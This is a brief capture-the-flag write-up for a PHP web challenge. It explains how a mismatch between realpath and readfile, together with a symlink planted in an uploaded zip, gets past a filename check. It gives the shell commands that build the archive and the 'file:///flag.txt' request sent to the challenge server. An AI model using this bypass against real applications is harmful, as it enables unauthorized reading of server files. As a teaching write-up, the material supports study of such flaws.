Useful characteristics of PHP functions:

• The function realpath will expand symbolic links in the given path.
• The function readfile accepts an URL as the path of the file to read.

Therefore, file:///flag.txt will be treated as URL pointing at /flag.txt by readfile while being treated as a file flag.txt in the directory file: by realpath.

Putting a symbolic link as flag.txt will eliminate a string flag from the result of realpath and bypass the check.

To exploit this point, create a file file_flag.zip via this commands:

mkdir file:
cd file:
touch meow.txt
ln -s meow.txt flag.txt
cd ..
zip -ry file_flag.zip file:

Then upload the file and access http://65.108.176.76:8200/?file=file:///flag.txt to get the flag.

Original writeup (https://mikecat.github.io/ctf-writeups/2021/20211218_hxp_CTF_2021/WEB/unzipper/#en).